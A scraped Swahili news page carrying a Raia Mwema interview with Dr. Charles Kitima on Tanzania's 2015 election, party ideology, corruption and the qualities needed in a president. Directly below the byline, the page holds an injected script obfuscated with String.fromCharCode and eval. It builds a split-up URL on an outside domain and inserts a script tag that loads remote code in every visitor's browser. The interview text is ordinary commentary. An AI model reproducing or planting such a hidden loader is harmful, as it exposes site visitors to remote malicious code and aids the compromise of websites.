Recent Comments

Dk. Kitima: Tunataka Rais atakayefanya uamuzi kwa kutumia nyongo

By Baraka Bitariho Aug 30, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

dk. kitima

Tunapoelekea Uchaguzi Mkuu, Mwandishi Wetu Deus Bugaywa, amefanya mahojiano na aliyekuwa makamu mkuu wa Chuo Kikuu cha Mtakatifu Augustine (SAUT), Dk. Charles Kitima, ambaye pamoja na mambo mengine, amezungumzia hali ya kisiasa nchini na aina ya kiongozi anayetakiwa na Tanzania ya leo. Endelea…
Raia Mwema: Hali ya siasa nchini imebadilika. Tunaona matukio yasiyokuwa ya kawaida, baadhi ya wanasiasa wamebadili misimamo na mitazamo yao ghafla. Unatafsiri vipi hali hiyo?
Dk. Kitima: Kwanza kama ambavyo imejitokeza, uchaguzi wa mwaka 2015 unaibua hali ya kukua kwa demokrasia. Ni uchaguzi unaoonyesha demokrasia ndani ya jamii ya Watanzania imekua na imewafikia watu kwa kiwango kizuri na watu wanatambua haki zao za kisiasa na kijamii.
Watu wamefika mahali wanaona lazima wajitawale wenyewe, na hii unaona jinsi ambavyo vyama vya Upinzani vimepata nguvu haraka sana. Ukiangalia tangu mwaka 2010 mpaka 2015, kuna kukua kwa haraka sana kwa vyama ya Upinzani na hasa Chama cha Demokrasia na Maendeleo (Chadema) ambacho kimebeba vijana wengi wenye uelewa na elimu ya kutosha.
Pili, watu wamefika mahali wanaamini kwamba ni vizuri kabisa vyama vianze kushindana katika kutoa uongozi wa kuongoza nchi, hili limeanza kukubalika kwa watu. Lakini changamoto kubwa tuliyo nayo, ni, je, vyama vyenyewe vimejipanga kweli kufanya hiyo kazi ya ushindani ya kuwapa wananchi hiyo fursa wanayoitaka?
Wananchi wanataka kuona kila chama kinawaambia kiko tayari, vyama vyote viwe sawa, yaani kusiwe na chama kinachojiona kiko juu ya vyama vingine. Wananchi wameanza kuona vyama vyote viko sawa lakini vyama vyenyewe havijaanza kufanya mabadiliko ya ndani na kuona kwamba wao ni mbadala wa vyama vingine.
Raia Mwema: Ukizungumzia vyama, Chadema kimekuwa chama kinachokua, lakini karibuni kilifanya uamuzi ambao haukupokelewa vizuri na baadhi ya wanachama wake, uamuzi ambao umepewa tafsiri kwamba chama hicho kimeshindwa kusimamia misingi yake iliyokipa umaarufu kwa umma, hii maana yake nini?
Dk. Kitima: Kwanza kila chama kinapaswa kuwa na falsafa na itikadi yake, falsafa ya Chama Cha Mapinduzi (CCM) tunaona zimeegemea kwenye mfumo wa muda mrefu wa wananchi kujiona kwamba wao ni taifa moja na vyote vilivyoko kwenye nchi hii ni mali yao na wanapoona, kwenye Chama Cha Mapinduzi, mtu mmoja anatumia fursa ya yeye kuwa tajiri kwa sababu ya uongozi na wakati tulishakubaliana kwamba vyote vilivyo ndani ya nchi yetu ni mali yetu sote, hiyo iliwafanya watu kukata tamaa na kuona kwamba wanakiuka ile itikadi na falsafa ya CCM.
Kwa hiyo rushwa na mtu kujilimbikizia mali wakati taifa ni maskini vimeonyesha kabisa kwamba watu hawako tayari kuvumilia ukiukwaji wa itikadi na falsafa ya Chama Cha Mapinduzi. Hilo limejitokeza kwenye CCM kwa muda mrefu, na tunashangaa zaidi tunapoona ndani ya chama hicho kuna watu ambao waliwaondoa kwenye uwaziri kwa sababu ya kuhusika na rushwa lakini leo watu walewale wanarudishwa tena kuwa wagombea wa nafasi mbalimbali za uwakilishi. Vitu hivi vinawakatisha tamaa wananchi.
Tukija kwenye Chama Cha Demokrasia na Maendeleo unasikia walikuwa wanatumia nguvu ya umma, kwamba watu ndio wenye dhamana ya kujitawala, na serikali inapewa dhamana ya kutawala kutoka kwa watu, hiyo falsafa yao wameijenga katika ibara ya 8 ya Katiba ya Jamhuri ya Muungano wa Tanzania, ambapo mamlaka yote yanatoka kwa wananchi na serikali iliyoko madarakani inapewa ridhaa na wananchi.
Na inatarajiwa kwamba, anayechukua nafasi ya kugombea, kwa mfano urais, lazima awe amekuzwa ndani ya hiyo falsafa ya Chadema, sasa tunajiuliza walipowapokea watu kutoka nje na wengine wakawapa nafasi za kugombea, hawa wanaielewa hii falsafa?
Tunajifunza kitu kimoja kutoka Chadema. Kuna kukata tamaa. Watu wameona kabisa bila kupata mtu ambaye labda ana mvuto fulani kwa wapiga kura walio wengi, hawataweza kufanikiwa. Pale tumeona pia hitilafu kubwa sana, kwamba watu wanaweza kusahau misingi yao wakamkubali tu yeyote ili mradi awavushe wanavyodhani wao.
Lakini kwa jumla vyama vyote tunaona vina hitilafu. CCM ina hitilafu zake na Chadema ina hitilafu zake kuelekea uchaguzi huu wa 2015, ni vyama ambavyo vimefika mahali walau vinawashindanisha Watanzania vizuri, lakini vyote vimekiuka falsfa zao na itikadi zao. Hawa wako kwenye rushwa sana, wameshidwa kudhibiti rushwa kama mfumo na hawa wengine wameshidnwa kusimamia misingi yao.
Sasa, tunaingia kwenye uchaguzi tufanye nini? Sisi hapa kama Watanzania tutazame watu ambao tunawapigia kura. Tuwashindanishe hawa, tuone yupi ambaye ataifanya nchi yetu iwe nchi ambayo wananchi wanajitawala wenyewe.
Tunataka hawa wagombea wanaojitokeza ni yupi ambaye ataifanya Tanzania iwe yenye maendeleo ambayo kila Mtanzania atayapata, yamguse kila mmoja ili aondokane na dhiki aliyo nayo, huyo ndiyo tumtazame vizuri.
Na tuangalie historia za hawa wagombea, wao wenyewe uwezo wao wa kutenda ni upi, kwa sababu Tanzania ni nchi inayoongozwa kwa mfumo wa urais. Rais ana mamlaka makubwa sana, kwa hiyo unapoongozwa lazima uhakikishe kwamba huyu rais ana uwezo wa kuivusha nchi katika hatua ambayo hatujafika bado, na hatua ambayo italeta neema kubwa zaidi.
Hapa lazima Watanzania wawe wakweli kwa wao wenyewe kwa sababu wakifanya makosa tutajikuta tunafanya mabadiliko kweli ya vyama lakini hatuna mtu wa kuongoza nchi na hatuna mbadala wa mfumo wa kuifanya nchi yetu ibadilike, kwa hiyo tunapaswa kufanya mageuzi ndani ya nchi yetu, mageuzi ya kiuchumi hasa, mageuzi ambayo yanahitaji muono mkubwa upana wa uelewa wa yule atakayechukua nafasi ya urais.
Raia Mwema: Ukisikiliza sauti za wanaotaka mabadiliko, baadhi yao wanasema agenda yao kubwa kwa sasa ni kuiondoa CCM madarakani, halafu baada ya hapo mambo mengine yatafuata, unadhani hapa tulipofika tunahotaji mabadiliko ya aina hiyo?
Dk. Kitima: Niseme hivi, kukiondoa chama fulani kwenye utawala bila kuwa na mkakati unaoeleweka, ambao wananchi wote wanauridhia, hakutakuwa na tija. Pawepo na mkakati wa kufanya mageuzi ya kiuchumi ya kitaifa, sasa hivi tunahitaji sana mageuzi ya kiuchumi, ni kweli katika mageuzi ya kisiasa tumefika mahali fulani, lakini kuna mageuzi ya kiuchumi tunayotakiwa kuyafanya, huo mkakati tulitakiwa kuujadili kwa kina, lakini bado hatujaujadili.
Na watu sasa hivi wanadhani maendeleo yanazuiwa na chama, lakini sisi tunaona kwamba nchi yetu kwa hatua iliyopigwa na kwa hatua ilipofikia, tunahitaji uongozi utakaosababisha mageuzi makubwa ya mfumo wa uchumi na mfumo wa kisiasa.
Kwa hiyo kufanya mabadiliko ya chama bila kuwa na mkakati wa mageuzi ya kiuchumi ni kujiingiza katika dimbwi ambalo tunaweza kuwa kwenye matatizo makubwa mbele ya safari. Nchi kama Kongo (Jamhuri ya Kidemokrasia – DRC), ilikuwa imetaliwa na Mobotu (Seseseko, Rais wa Zaire sasa DRC) alikuwa diteta, alikuwa na nguvu nyingi sana kama Chama Cha Mapinduzi kilivyo na nguvu, lakini walipomuomndoa Mobutu, bila kuwa na mkakati wa kufanya mageuzi ya kiuchumi na kisiasa ndani ya nchi yao, wamebaki mpaka sasa hawajui wafanye nini, na ndiyo maana DRC iko kwenye vita mpaka leo.
Tumeona Tunisia vijana walitaka kufanya mabadiliko makubwa sana, wameyafanya lakini mpaka sasa hawawajatulia. Tumeona Libya, tumeona Misri na nchi nyingine za Uarabuni nyingi tu ambazo zilitaka kuondoa hiyo mifumo iliyokuwa inakandamiza raia, lakini hawakuwa na mkakati wa uongozi wa kubadilisha mfumo wa kisiasa na uchumi, kusema wanataka waweje.
Tulipaswa kutengeneza mkakati wa kuleta mageuzi ya kisiasa na kiuchumi. Tuseme huu ndiyo mkakati tunaotaka, unaweza kuendeshwa na nani. Hapo ndipo tungepaswa kusema ni fulani, kwenye chama gani, chama chake kitamuunga mkono?
Lakini mimi niseme, Watanzania wasiwe na hofu sana na mambo ya vyama. Vyama vilivyopo vyote vinahitaji kufumuliwa upya ili viweze kukidhi changamoto za maisha ya sasa. Vyama vyote vilivyopo sasa hivi havijalenga bado kuifanya Tanzania kuwa taifa la watu wa kipato cha kati. Tunapoongelea mtu wa kipato cha kati kwa sasa ni mtu ambaye kwa mwezi ana pato kati ya dola 200 na 500.
Hivyo tunavyoviongea unapaswa kufikiria, asilimia 70 ya Watanzania wanafanya kazi ya kilimo na ufugaji, je, serikali ina mkakati wa uhakika wa kutafuta masoko ya mazao ambayo kila mwezi yatampatia mkulima zaidi ya dola 200 – 500, kama serikali hiyo haipo ndiyo wakati wa kujiuliza ni nani ambaye atatuletea mfumo huu.
Kwa sababu serikali kama serikali inategemea uongozi, suala la nchi yetu kusonga mbele ni uongozi, Julius Nyerere alisimama vizuri ndiyo maana kila mtu leo anamkumbuka, kwa sababu alikuwa na maono mapana. Na sasa hivi tunahitaji rais mwenye maono mapana, ambaye atafanya kazi kuinua Watanzania na anayeweza kusimamia vizuri sheria na matashi ya Watanzania wenyewe.
Binafsi katika kulieleza hili suala la mabadiliko kwa ajili tu ya mabadiliko ningesema kwa kweli hiyo na yenyewe inaweza isitufikishe popote. Lazima tuwe na mkakati tunataka mabadiliko ili tuendelee, lakini kutaka tu mabadiliko bila kujua tunataka twende wapi, hatuwezi kuwa na vigezo vya kumpima rais atakayeweza kutufikisha mahali tunapotaka, atakuwa na sifa zipi.
Raia Mwema: Umesema watu waangalie mtu zaidi kuliko chama, lakini iko dhana kwamba mtu atakayechaguliwa anaweza kumezwa na nguvu na ushawishi wa wahafidhina kwenye chama, kiasi kwamba uwezo wake usionekane, unasemaje kwa hili?
Dk. Kitima: Ninavyoona kwa Tanzania, vyama vyetu baada ya rais kuingia madarakani havina nguvu kumzidi rais, kwa sababu rais anaweza kwa nguvu alizopewa na Katiba hii iliyopo sasa hivi, ana nguvu kuliko chama chake, na kwa sababu kuna mhimili wa dola ambao hauingiliwi na vyama, bado rais anaweza akafanya kazi na vyombo vya dola akasimamia sheria vizuri bila kuyumbishwa na chama.
Chama kweli kina nguvu kumsadia, na labda tumezoeshwa na Chama Cha Mapinduzi kinachagua watu wake au kinapitisha sheria ambazo hazifai, lakini bado kuna sheria zilipitishwa hazifai na Rais akabadili kwa kufuata watu wanataka nini, lakini chama kilielekeza mtindo fulani, tumeona mara nyingi sana rais ameweza kusikiliza wananchi.
Mfano suala la Mabadiliko ya Katiba, licha ya kwamba mchakato ulikuja kuharibika mbele, lakini mwanzo wana CCM walikataa ombi la kufanya Katiba Mpya, lakini baadaye rais ilibidi awasikilize wananchi na akakubalia kuanzisha mchakato, pamoja na kwamba mchakato wenyewe umeishia vibaya lakini wazo lilitoka kwenye Upinzani, kwa hiyo tunaona mamlaka ya rais yanavyoweza kuwa makubwa kuliko chama chake, huo ni mfano hai kabisa.
Ninachotaka kuonyesha ni kwamba chama kama chama hakina nguvu kumzidi kiongozi wa nchi aliyewekwa na wananchi wote, kwa sababu anayemuweka madarakani rais ni wanachi wote si wanachama, ila chama ndicho kimeleta mgombea, na wao kuleta mgombea huyo haina maana yule ni wa kwao, ni wa nchi nzima. Na rais anayejali Katiba anawasikiliza wananchi, hasikilizi chama chake tu.
Chama kinampa ushauri na mwongozo, lakini nchi siyo ya chama ni ya Watanzania wote. Hatupaswi kuwapa hofu wananchi, wawe huru na watulie wajue kabisa kwamba rais atakayewekwa na wananchi, ndiye rais wa nchi yetu. Na wala wasidhani kwamba rais atashinikizwa na chama kile, bado rais anaweza kusimama kwa Katiba, kwa sababu anaongoza nchi kwa mujibu wa Katiba ya nchi. Rais anayeheshimu taasisi ya urais, rais anayejiheshimu na yeye mwenyewe lazima aangalie wananchi wanataka nini si chama chake kinataka nini.
Akifuata chama chake na kudharau wananchi huyo atakuwa ni msaliti wa kura za Watanzania kwa sababu ataapishwa kwa mujibu wa Katiba ya Jamhuri ya Muungano wa Tanzania si kwa mujibu wa katiba ya chama chake. Rais si chombo cha chama, rais ni chombo cha kitaifa. Kwa hiyo tunatarajia wagombea urais wasimame katika msimamo wa wananchi wa Tanzania wanataka nini.
Raia Mwema: Watanzania wana namna yoyote ya kuepuka ushawishi wa pesa za rushwa zilizotumika kwenye mchakato wa uchaguzi au tayari tumeshaathirika na kwa hiyo tunaweza kupata kiongozi anayetokana na matumizi ya fedha chafu?
Dk. Kitima: Ukweli kama kuna kitu ambacho kimesikitisha Watanzania tangu Baba wa Taifa aache madaraka, ni matumizi ya pesa kwa ajili ya kurubuni kupata nafasi za uongozi katika ngazi zote.
Nchi nzima tumeingiwa na tatizo la rushwa, na hili limeathiri vyama vyote, vimeathiriwa sana suala la pesa. Mtu anapotumia ushawishi wa pesa daima anaua ule moyo wa mtu kufanya uamuzi wake binafsi bila kushwishiwa.
Watanzania wamechoshwa na hiyo kitu lakini umasikini unaotukumba unawafanya wawe kwenye dimbwi lile lile, hawataki hiyo hali lakini hiyo hali ndiyo iko pale.
Ni kweli Chadema kilijitahidi sana kupambana na rushwa, kilikuwa kinajitahidi kuchangisha watu kwenye mikutano yake, watu walikuwa wanakwenda kwenye mikutano ya Chadema kwa gharama zao, sasa hvi sijui kama hicho kitu kinaendelea. CCM huko nyuma na mpaka sasa hivi katiba yake inakataa rushwa kwa nguvu zote, lakini tunashangaa chama hiki hiki ambacho kimejengwa kwa misingi inayopinga rushwa ndiyo kinawarudisha watu ambao wako kwenye dimbwi. Hili tatizo kwa sasa linavikumba vyama vyote.
Kwa wagombea, yeyote atakayeonekana anatumia pesa kwena Ikulu, wamhukumu bila kumuonea huruma, kwa sababu rushwa yeyote ile inafanya wananchi wapate mtu ambaye hastahili, kwanini mtu kama ana uwezo asikubali tu wananchi wamwingize madarakani bila hela yake.
Kwa kweli tukivumilia na kuacha hii iendelee tutapata shida sana, mimi nilipendezwa sana na mchakato wa wagombea urasi Dodoma wa CCM, pale kwa mara ya kwanza, walau tangu mimi nianze kufuatilia mambo haya, lakini walau ule mchakato ulipangiliwa kwa namna ya kupunguza harufu ya rushwa.
Kwa maneno mengine, anayetafuta kuingia Ikulu kwa pesa hafai. Kiongozi anayetumikia Tanzania anapaswa kuibeba Tanzania moyoni mwake na bila kuwarubuni wananchi. Anapaswa kuwaonyesha Tanzania mpya anayotaka awajengee wamuunge mkono na wampe ruhusa ya kuwajengea hiyo Tanzania. Hatutaki mtu anayegombea atuonyeshe kwamba atatuondolea matatizo yetu kwa kutumia hela yake, nchi hii ina utajiri wa kutosha. Pesa za mtu binafsi zikijitokeza katika nafasi ya kwenda Ikulu ni kutuingiza katika matatizo kama nchi.
Raia Mwema: Uamuzi wa Dk. Wilbrod Slaa na Prof. Ibrahim Lipumba, kujiweka kando na siasa katika kipindi muhimu kama hiki unatoa picha gani?
Dk. Kitima: Binafsi ninaheshimu sana mtu anayesimamia misingi ya chama chake na kutokuteteleka katika msingi hiyo. Kama tangu mwanzo mmejenga chama vizuri kwa kutumia misingi fulani halafu dakika za mwisho mnasema misingi hapana tufuate njia ya mkato, mtu anayejitoa kwenye mazingira ya namna hiyo ni wa kuheshimiwa sana.
Wamefanya uamuzi wao sahihi wanapoona wanapelekwa kinyume na misingi ya chama walichokiamini, misingi ya uongozi waliyopigania, nadhani wamefanya uamuzi mzuri wa kukaa pembeni.
Lakini vyama na vyenyewe vimefanya maamuzi yao, mimi nawapongeza kwa uamuzi wao binafsi kwamba walisimamia misingi ambayo imebadilishwa na wanachama wenzao, sababu chama ni cha watu si cha mtu, kwa hiyo, na wao wameacha vitu viende wanachama wanavyotaka kuliko kuliko kusababisha misuguano isiyo na maana.
Lakini vile vile hii inatupa maswali mengi. Upinzani utakuwa unatekwa tu njiani njiani, kwa sababu ndiyo tunaanzisha mazingira, mbele kule Upinzania utatekwa tena na nani? Kilichomfanya mtu akubalike kwa haraka ni kitu gani? Ni misingi ya chama, falsafa ya chama, itikadi ya chama au ni kitu gani? Chama kinaweza kumpokea mtu yeyote kikampa nafasi hiyo sheria zinasemaje? Katiba ya chama inasemaje?
Kama katiba haikuzingatiwa ikapindishwa dakika moja, hapo lazima tujiulize hiki chama ambacho kinapokea mtu last minute (dakika ya mwisho) na kuwambia wewe chukua ridhaa, sawa kama wameona utaratibu wa chama chao uko hivyo, na katiba yao inaruhusu hivyo sawa.
Hawa wawili wamefanya jukumu lao, kufanya uamuzi kadiri ya dhamiri zao na mimi nawaona ni watu waliofanya maamuzi mazuri, wabaki tu pembeni waache wanachama wasonge mbele.
Raia Mwema: Uko mtazamo kuwa uchaguzi huu ni kama fainali kwa vyama vikubwa, CCM na Chadema, chochote kitakachoshindwa kinakabiliwa na hatari ya kupoteza mvuto wa kisiasa au hata kufa kabisa, kuna ukweli gani kwenye dhana hii?
Dk. Kitima: Ni kweli. Kila uchaguzi ambao uko huru na haki, huwa ni definitive, huwa ni hitimisho kwa maana kwamba aliyeshinda ameshinda na aliyeshindwa anabaki nyuma.
Kuendelea kwa uhai wa vyama vilivyopo, hivyo vitaendelea lakini vitakuwa na nguvu gani ya ushawishi kwa wananchi kwamba vyama hivi vina uwezo bado wa kuwaletea wananchi wagombea wazuri litakuwa ni suala zito sana kujibu kwa sababu kama nyinyi mnategemea yeyote atakayekuja dakika ya mwisho ndio mje muwaambie wananchi, tumepata huyu hapa tunawashukuru au kama nyinyi CCM chama tawala mtakuja mnasema tumepata huyu hapa wa siku zote hilo ni tatizo.
Lakini tuseme kitu kimoja kwa vyama hivi viwili ni kwa mara ya kwanza katika historia ya Tanzania tunakuwa na uchaguzi ambao ni ushindani wa kikweli, kwamba CCM na Chadema vinaingia kwenye ulingo wa uchaguzi ulio na mvuto. Kila mtu hajui kama atashinda kwa kutumia kura ya kwaida ya mwananchi. Wagombea hawa wawili inabidi wafanye kazi ya ziada kuwaonyesha wananchi kwamba yeye ni kiongozi wa taifa wala si kiongozi wa kikundi au chama fulani.
La pili, katika uhai wa CCM, kinapaswa kufanya mabadiliko makubwa ndani lakini CCM haitakaa ife, haiwezi kufa, kwa sababu ni chama chenye historia ya muda mrefu ni chama ambacho kina tunu ambazo zimejenga nchi pia, Umoja, jina kubwa kwa Afrika, ni chama ambacho kimesaidia nchi nyingi sana duniani, na bado kina nguvu kubwa, kama huko nyuma walijisahau wakaona kwamba ni wao tu, lakini sasa inabidi warudie misingi ya chama chao na inabidi waiishi, hicho ndicho kitu kitakifanya Chama Cha Mapinduzi kibaki madarakani muda mrefu tu.
Chadema kina changamoto kubwa kwa sababu uongozi ulioisaidia Chadema kufika hapo ilipofika mpaka waje wampate mgombea kutoka nje ya Chadema uongozi huo haupewi haki zake, utawapa mashaka sana siku za mbele watu wengine kukiongoza, kwa sababu usipoutambua uongozi uliokikuza chama, usipoutambua uongozi uliofanya wananchama baadhi watoe maisha yao kwa ajili ya hiki chama, ukawapa zile haki zao kukawa na demokrasia ndani ya chama, ujue chama hicho kina mashaka sana kwenda mbele.
Lakini kuna uwezekano pia kikazaliwa chama kingine ndani ya hivi vyama ambacho kitakuwa kizuri zaidi cha kushindana na chama chochote tawala, nina imani bado tuna nafasi kubwa kwa vyama hivi viwili lakini ni muhimu sana kwa vyama vyote kuheshimu uongozi wake na kusimamia zile tunu na falsafa zao bila kuzigeuza ili watu na vizazi vijavyo vione kwamba falsafa ya chama ndiyo inayofanya chama kipewe dhamana na wananchi kuongoza nchi.
Raia Mwema: Kwa ushindani huo ulio karibu sawa, tunaweza kusema utabiri wa Mwalimu Nyerere kwamba, upinzani wa kweli utatoka CCM, ndiyo unatimia?
Dk. Kitima: Nadhani tafsiri ya Mwalimu Nyerere ilikuwa tofauti. Kwanza CCM kilipaswa kujenga vyama vya Upinzani vizuri, lakini kwa muda mrefu tumeona hakivisaidii.
Kuhama kwa baadhi ya watu waliokuwa viongozi ndai ya CCM haya mambo yalipaswa kufanyika miaka kumi iliyopita ili waingize baadhi ya tunu za historia ya kisiasa ya nchi yetu. Walipaswa kuingia ndani ya vyama vya upinzani kwa muda mrefu lakini si dakika za mwisho wakati watu wanatafuta madaraka.
Hii ya kusema kwamba Upinzani wa kweli utatoka ndani ya CCM kweli lakini inabidi sasa kuhama kuendelee ili hao wanaohamia huku wawe kambi kweli ya Upinzani, wakijua mazuri yaliyokuwa CCM wakayapeleka kule wakaleta na mazuri yaliyokuwa Upinzani wakaja na mbadala hapo ndipo watajenga Upinzani wa kweli.
Lakini haina maana kwamba mtu mmoja kwenda kugombea huku ndiyo utabiri huo unatimia, hapana. Zoezi hilo la kufanya upinzani wa kweli utoke CCM ninaona bado halijaanza sababu watu wengi wametoka huko kwa sababu wamekataliwa.
Ikiwa wamekataliwa kwa hali au kwa kuonewa hilo ni suala jingine. Watakaotoka huko kwa nia nzuri kwamba tunataka kujiunga Upinzani wajitoe mapema, sisi tunaenda CUF au Chadema ili tukajenge Upinzani mzuri, ambao huku walikuwa ni viongozi wa vyama, hao ndiyo watafanya upinzani kuwa mzuri.
Raia Tanzania: Kati ya wengi, tunao wagombea wawili wenye nguvu, kwa maoni yako, nani unaona anaifaa Tanzania ya leo?
Dk. Kitima: Mimi kabisa nawaona wana nguvu zinazofanana katika mvuto wa watu, na katika uzalendo wa nchi. Wananchi wenyewe watawapima, kwa sababu tunaangalia vilevile watu hawa wawili katika utawala wao walisimamia vipi shughuli mbalimbali za umma walizopewa kwa manufaa ya wananchi.
Katika utendaji wao, walitenda mangapi kwa ajili ya wananchi? Walipotumwa kufanya uamuzi mgumu kwa manufaa ya wananchi, walifanyaje? Waliongozwaje na sheria? waliheshimuje haki za binadamu? waliheshimuje utawala wa sheria? Katika hayo wananchi wawapime. Wanatenda kwa kiwango gani kwa manufaa ya Watanzania? Wote wawili walikuwa kwenye chama kimoja na tunashukuru kwamba hawakuwa viongozi wa chama huko walikokuwa, kila mmoja alikuwa mtendaji, lakini ni nani aliyeitumikia Tanzania vizuri walipopewa dhamana ya kuwa katika nafasi za kushika uwaziri.
Unapompima mtu mpime katika kila wizara aliyopewa, alifanyaje kazi kwa umakini na kwa manufaa ya wananchi. Hata wenyewe wajipime, na katika kuona hayo basi wananchi wenyewe wawahukumu.
Kama mtu unasema ni mzuri ulimpa kazi kitaifa akafanya kwa manufaa ya nchi yetu na hatujawahi kumuwekea alama ya kuuliza katika utendaji wake? Kwa hiyo tumuamini yeye kwamba ndiye atakayetuwezesha pia katika hatua hii. Wananchi wapime kwa kadiri ya uzoefu wa utendaji wao na uwezo wa upeo wa uelewa wao.
Na nchi yetu sasa hivi, iko vibaya sana kiuchumi, tunahitaji mtu mwenye mwenye uthubutu mwenye kuweza kufanya uamuzi kwa kutumia nyongo (uamuazi mgumu kwa maslahi ya umma), ili nchi iende mbele, tusiwe sehemu ya kutajirisha mataifa mengine, mwenye kufanya nchi yetu wananchi wote wawezeshwe kwa elimu ujuzi katika kuzalisha mali na kulifanya taifa lirejee heshima yake ya kuzalisha mali.
Kati ya hawa wawili tumchague yule ambaye anaweza kuthubutu kusema kuanzia leo hatutaki hiki tunataka hiki, nchi yetu inaanza hapa inaenda hivi watupe dira wanakotaka twende, tunaenda wapi, wao wenyewe, kwa sababu nchi yetu inategemea sana rais. Rais mwenye mtazamo mpana ndiye atakayeongoza Tanzania. Kichwa cha rais Tanzania ni yeye mwenyewe, umuhimu wa rais wa Tanzania ni yeye mwenyewe anavyoweza kuona, anavyoweza kufikiri, miwani ya rais wetu inavyoona dunia na kuweza kuifanya nchi yetu iwe ya maana duniani, huyo ndiye tunayemtaka, Rais asiyeona mbali kwa Tanzania hafai.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com